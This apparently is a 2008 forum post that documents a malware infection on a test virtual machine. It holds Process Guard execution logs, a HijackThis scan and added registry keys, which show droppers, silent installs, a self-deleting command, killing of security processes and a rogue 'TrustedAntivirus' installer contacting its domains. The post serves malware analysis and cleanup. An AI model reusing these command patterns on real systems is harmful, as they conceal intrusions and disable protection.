[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:46:55 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3168]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:46:59 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3992]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:01 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [748]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:47:04 [EXECUTION] "c:\windows\system32\bv2\renabcom4.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3112]
[EXECUTION] Commandline - [ c:\windows\system32\bv2\renabcom4.exe ]
Thu 06 - 22:47:05 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [788]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]
Thu 06 - 22:47:09 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1400]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:13 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3932]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:16 [EXECUTION] "c:\windows\17pholmes572.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ "c:\windows\17pholmes572.exe" 61a847b5bbf728173599284503996897c881250221c8670836ac4fa7c8833201749139 ]
Thu 06 - 22:47:20 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:26 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:47:50 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3616]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:48:01 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [3368]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:04 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2320]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:06 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3500]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:48:12 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:48:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3492]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:48:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\cmdinst.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\ev4\philcom3.exe" [3772]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\cmdinst.exe /verysilent ]
Thu 06 - 22:48:25 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" [1316]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:48:28 [EXECUTION] "c:\windows\17pholmes1000106.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ "c:\windows\17pholmes1000106.exe" 61a847b5bbf72813329b385772ff01f0b3e35b6638993f4661aa4ebd86d67c56389b284534f310 ]
Thu 06 - 22:48:30 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3508]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:48:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:48:44 [EXECUTION] "c:\docume~1\kly\locals~1\temp\xpre.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\xpre.exe" ]
Thu 06 - 22:48:55 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:48:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2800]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:49:05 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\cmdinst.exe" [3080]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" /sl4 $190236 "c:\docume~1\kly\locals~1\temp\cmdinst.exe" 542512 52224 /verysilent ]
Thu 06 - 22:49:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [2152]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:49:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [308]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:49:22 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3420]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:25 [EXECUTION] "c:\docume~1\kly\locals~1\temp\snapsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\snapsnet.exe" ]
Thu 06 - 22:49:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\fb3\rvdll36.exe" [3736]
[EXECUTION] Commandline - [ cmd /c ""c:\docume~1\kly\locals~1\temp\un.bat" " ]
Thu 06 - 22:49:31 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3636]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:49:35 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-s20u8.tmp\is-36946.tmp" [3392]
[EXECUTION] Commandline - [ "c:\windows\s0xz\command.exe" /install ]
Thu 06 - 22:49:40 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ "c:\windows\system32\cmd.exe" /c start "" "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [308]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:45 [EXECUTION] "c:\docume~1\kly\locals~1\temp\rasesnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:49:47 [EXECUTION] "c:\windows\system32\idlo01\idlo011065.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3268]
[EXECUTION] Commandline - [ c:\windows\system32\idlo01\idlo011065.exe ]
Thu 06 - 22:49:49 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3284]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:49:52 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3392]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" qi ]
Thu 06 - 22:49:54 [EXECUTION] "c:\windows\s0xz\command.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ c:\windows\s0xz\command.exe ]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\virtual machine additions\vmusrvc.exe [368]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\common files\symantec shared\ccapp.exe [428]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\pgaccount.exe [508]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\processguard\procguard.exe [872]
Thu 06 - 22:49:55 [MODIFY] c:\windows\s0xz\command.exe [2404] was blocked from modifying c:\program files\ethereal\ethereal.exe [1236]
Thu 06 - 22:49:56 [EXECUTION] "c:\docume~1\kly\locals~1\temp\winvsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2180]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\winvsnet.exe" ]
Thu 06 - 22:49:58 [EXECUTION] "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\mshta.exe" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\wavvsnet.exe" ]
Thu 06 - 22:50:00 [EXECUTION] "c:\program files\network monitor\netmon.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [616]
[EXECUTION] Commandline - [ "c:\program files\network monitor\netmon.exe" service ]
Thu 06 - 22:50:02 [EXECUTION] "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [3556]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" ]
Thu 06 - 22:50:04 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:50:11 [EXECUTION] "c:\program files\common files\yazzle1281oinadmin.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\yazzsnet.exe" [2152]
[EXECUTION] Commandline - [ "c:\program files\common files\yazzle1281oinadmin.exe" -install -name "yazzle1281" -userid 1281 ]
Thu 06 - 22:50:14 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2780]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 22:50:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml2.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml2.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:18 [EXECUTION] "c:\docume~1\kly\locals~1\temp\mshtml3.exe" was allowed to run
[EXECUTION] Started by "c:\program files\common files\yazzle1281oinadmin.exe" [3832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\mshtml3.exe" -vt yazb -pid 5 -rid 99001281 ]
Thu 06 - 22:50:25 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\rasesnet.exe" [2244]
[EXECUTION] Commandline - [ rundll32.exe ,a ]
Thu 06 - 22:50:28 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [2244]
[EXECUTION] Commandline - [ cmd /c c:\docume~1\kly\locals~1\temp\removalfile.bat "c:\docume~1\kly\locals~1\temp\rasesnet.exe" ]
Thu 06 - 22:50:46 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\xpre.exe" [288]
[EXECUTION] Commandline - [ cmd /c ping localhost -n 3 >> nul && del "c:\docume~1\kly\locals~1\temp\xpre.exe" >> nul ]
Thu 06 - 22:50:47 [EXECUTION] "c:\windows\system32\ping.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [3652]
[EXECUTION] Commandline - [ ping localhost -n 3 ]
Thu 06 - 22:51:45 [EXECUTION] "c:\windows\system32\taskmgr.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [572]
[EXECUTION] Commandline - [ taskmgr.exe ]
Thu 06 - 22:54:44 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [2904]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:54:46 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [2772]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]

At this point my VM did freeze ...
IPB Image

After reboot ...
QUOTE
---Process Guard Log Started---

Thu 06 - 22:58:43 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 22:58:48 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1956]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:01:20 [EXECUTION] "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" was allowed to run
[EXECUTION] Started by "c:\windows\downloaded program files\uga6p_0001_n122m2802netinstaller.exe" [1832]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus ]
Thu 06 - 23:01:27 [EXECUTION] "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\ni.uga6p_0001_n122m2802\setup.exe" [1744]
[EXECUTION] Commandline - [ c:\docume~1\kly\locals~1\temp\~uavsetup.exe /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:29 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" [1228]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" /sl4 $60136 "c:\docume~1\kly\locals~1\temp\~uavsetup.exe" 15424389 52224 /norestart /verysilent /url=trustedantivirus.com /pn=trustedantivirus /norestart ]
Thu 06 - 23:01:33 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\gfl.exe" /inireplace ga6plicense.ini ]
Thu 06 - 23:01:40 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\xmlreplacer.exe" "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\winav.xml" "[name]" "trustedantivirus" ]
Thu 06 - 23:01:52 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im pgs.exe ]
Thu 06 - 23:01:55 [EXECUTION] "c:\windows\system32\wbem\wmiprvse.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ c:\windows\system32\wbem\wmiprvse.exe -embedding ]
Thu 06 - 23:01:58 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im fwsvc.exe ]
Thu 06 - 23:02:02 [EXECUTION] "c:\windows\system32\taskkill.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\windows\system32\taskkill.exe" /f /im uga6pcw.exe ]
Thu 06 - 23:02:14 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:17 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:19 [EXECUTION] "c:\docume~1\kly\locals~1\temp\is-2h6n0.tmp\_isetup\_regdll.tmp" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ _regdll.tmp 448 456 ]
Thu 06 - 23:02:26 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:29 [EXECUTION] "c:\program files\trustedantivirus\activate.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\activate.exe" /"trustedantivirus" ]
Thu 06 - 23:02:31 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp blpatch trustedantivirus hxxp://trustedantivirus.com/ "c:\program files\trustedantivirus\dat\bnlink.dat" ]
Thu 06 - 23:02:32 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /insthelp sr ?action=23&abbr=uga6p_{pcid}_362.2&pc_id={computer_id}&gai={gai}&gli={gli}&gff={gff}&cnt={cnt}&lng={lng}&lp={lp}&addt={addt} hxxp://ykeeper.trustedantivirus.com/ hxxp://trustedantivirus.com/ trustedantivirus ]
Thu 06 - 23:02:34 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -domain hxxp://trustedantivirus.com ]
Thu 06 - 23:02:36 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -install ]
Thu 06 - 23:02:37 [EXECUTION] "c:\program files\common files\trustedantivirus\ugac.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\ugac.exe" -start ]
Thu 06 - 23:02:40 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "rundll32.exe" "c:\program files\trustedantivirus\dhlp.dll" _install@16 ]
Thu 06 - 23:02:42 [EXECUTION] "c:\program files\common files\trustedantivirus\bm.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\common files\trustedantivirus\bm.exe" dm=hxxp://trustedantivirus.com ad=hxxp://trustedantivirus.com sd=hxxp://ykeeper.trustedantivirus.com ]
Thu 06 - 23:02:44 [EXECUTION] "c:\program files\trustedantivirus\pgs.exe" was allowed to run
[EXECUTION] Started by "c:\docume~1\kly\locals~1\temp\is-vg2du.tmp\is-ebhm2.tmp" [1688]
[EXECUTION] Commandline - [ "c:\program files\trustedantivirus\pgs.exe" /quickscan ]
Thu 06 - 23:02:56 [EXECUTION] "c:\windows\system32\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\program files\network monitor\netmon.exe" [1824]
[EXECUTION] Commandline - [ c:\windows\system32\cmd.exe /u /c ipconfig.exe /displaydns ]
Thu 06 - 23:02:58 [EXECUTION] "c:\windows\system32\ipconfig.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\cmd.exe" [1240]
[EXECUTION] Commandline - [ ipconfig.exe /displaydns ]
Thu 06 - 23:03:06 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [784]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -embedding ]

In addition to the pile of crap, an antivirus for which I didn't even ask as a prime ... Detects a part of what the infection did install of course.
IPB Image
IPB Image
IPB Image
QUOTE
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 11:37:58 PM, on 3/6/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\S0xZ\command.exe
C:\WINDOWS\mrofinu1000106.exe
C:\Program Files\Network Monitor\netmon.exe
C:\Program Files\Common Files\TrustedAntivirus\ugac.exe
C:\Program Files\Common Files\TrustedAntivirus\bm.exe
C:\Program Files\TrustedAntivirus\pgs.exe

O2 - BHO: (no name) - {0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD} - C:\Program Files\Internet Explorer\xabe89104.dll
O2 - BHO: (no name) - {22342B44-5B98-4B30-9D53-C182AD8DF217} - C:\WINDOWS\system32\fccbbya.dll
O2 - BHO: CIEIntegrator Object - {5C3F6257-3E00-45C2-88D5-CB0F3A17BF0E} - C:\Program Files\TrustedAntivirus\Tools\pblock.dll
O2 - BHO: IEFW Object - {6F87F145-DC2D-4766-AF03-3A3B96FFAD98} - C:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
O4 - HKLM\..\Run: [runner1] C:\WINDOWS\mrofinu1000106.exe 61A847B5BBF72813329B385772FF01F0B3E35B6638993F4661AA4EBD86D67C56389B284534F310
O4 - HKLM\..\Run: [TrustedAntivirus] C:\Program Files\TrustedAntivirus\pgs.exe
O4 - HKLM\..\Run: [ugac] "C:\PROGRA~1\COMMON~1\TRUSTE~1\ugac.exe" -start
O4 - HKLM\..\Run: [bm] "C:\Program Files\Common Files\TrustedAntivirus\bm.exe" dm=http://trustedantivirus.com ad=http://trustedantivirus.com sd=http://ykeeper.trustedantivirus.com
O4 - HKLM\..\Run: [ptask] C:\Program Files\TrustedAntivirus\ptask.exe
O4 - HKLM\..\RunOnce: [overinstall] "C:\Program Files\TrustedAntivirus\pgs.exe" /empty
O4 - Startup: DW_Start.lnk = ?
O20 - Winlogon Notify: fccbbya - C:\WINDOWS\SYSTEM32\fccbbya.dll
O23 - Service: Command Service (cmdService) - Unknown owner - C:\WINDOWS\S0xZ\command.exe
O23 - Service: Network Monitor - Unknown owner - C:\Program Files\Network Monitor\netmon.exe
--
End of file - 5143 bytes
Note: I left out all legit entries.
Kimberly
Mar 6 2008, 11:47 PM
Registry.

QUOTE
Keys ignored: 0
---------------
* (none)

Keys added:
---------------
HKEY_CURRENT_USER\Software\Microsoft\Installer
HKEY_CURRENT_USER\Software\Microsoft\Windows Script
HKEY_CURRENT_USER\Software\Microsoft\Windows Script\Settings
HKEY_CURRENT_USER\Software\mozilla.org
HKEY_CURRENT_USER\Software\mozilla.org\Mozilla
HKEY_CURRENT_USER\Software\Opera Software
HKEY_CURRENT_USER\Software\TrustedAntivirus
HKEY_CURRENT_USER\Software\TrustedAntivirus\Settings
HKEY_CLASSES_ROOT\AppID\{EA7522F6-87CF-411e-8A55-19EE4344B676}
HKEY_CLASSES_ROOT\AppID\pblock.DLL
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}
HKEY_CLASSES_ROOT\CLSID\{0EBB0A8F-A20B-445C-9BC2-8D18256AC6BD}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}
HKEY_CLASSES_ROOT\CLSID\{22342B44-5B98-4B30-9D53-C182AD8DF217}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Control
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}
HKEY_CLASSES_ROOT\CLSID\{48E59293-9880-11CF-9754-00AA00C00908}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}
